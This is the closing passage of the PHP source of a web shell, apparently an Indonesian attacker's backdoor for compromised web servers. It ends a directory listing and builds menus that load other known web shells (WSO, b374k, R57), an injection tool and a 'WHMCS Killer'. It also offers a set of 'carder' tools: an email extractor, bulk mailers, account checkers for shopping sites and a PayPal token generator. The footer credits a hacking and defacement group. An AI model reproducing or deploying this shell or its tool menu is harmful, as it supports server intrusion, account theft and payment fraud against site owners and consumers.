4671.         }
4672.         echo "</tr></table>";
4673.     } else {
4674.         echo "<font color=red>Tidak Bisa Buka Direktori Makkk </font>";
4675.     }
4676.     }
4677. echo "<center><hr><form>
4678. <select onchange='if (this.value) window.open(this.value);'>
4679.   <option selected='selected' value=''> Tools Creator </option>
4680.   <option value='$ling=wso'>WSO 2.8.1</option>
4681.   <option value='$ling=injection'>1n73ction v3</option>
4682.   <option value='$ling=wk'>WHMCS Killer</option>
4683.   <option value='$ling=adminer'>Adminer</option>
4684.   <option value='$ling=b374k'>b374k Shell</option>
4685.   <option value='$ling=b374k323'>b374k 3.2</option>  
4686.   <option value='$ling=bh'>BlackHat Shell</option>      
4687.   <option value='$ling=dhanus'>Dhanush Shell</option>    
4688.   <option value='$ling=r57'>R57 Shell</option>    
4689. <option value='$ling=encodedecode'>Encode Decode</option>    
4690. <option value='$ling=r57'>R57 Shell</option>    
4691. </select>
4692. <select onchange='if (this.value) window.open(this.value);'>
4693.   <option selected='selected' value=''> Tools Carder </option>
4694.   <option value='$ling=extractor'>DB Email Extractor</option>
4695.   <option value='$ling=promailerv2'>Pro Mailer V2</option>    
4696.   <option value='$ling=bukalapak'>BukaLapak Checker</option>        
4697.   <option value='$ling=tokopedia'>TokoPedia Checker</option>  
4698.   <option value='$ling=tokenpp'>Paypal Token Generator</option>  
4699.   <option value='$ling=mailer'>Mailer</option>  
4700.   <option value='$ling=gamestopceker'>GamesTop Checker</option>
4701.   </select>
4702. <noscript><input type='submit' value='Submit'></noscript>
4703. </form>Copyright &copy; ".date("Y")." - <a href='https://www.facebook.com/groups/hallucyber/' target='_blank'><font color=#1dd1c2>Hallucination Team</font></a> thanks to <a href='https://www.facebook.com/wearenoobdefacer/' target='_BLANK'><font color=#1dd1c2>Badc0de</a></font></center>";
4704. ?>
4705.  
4706. </html>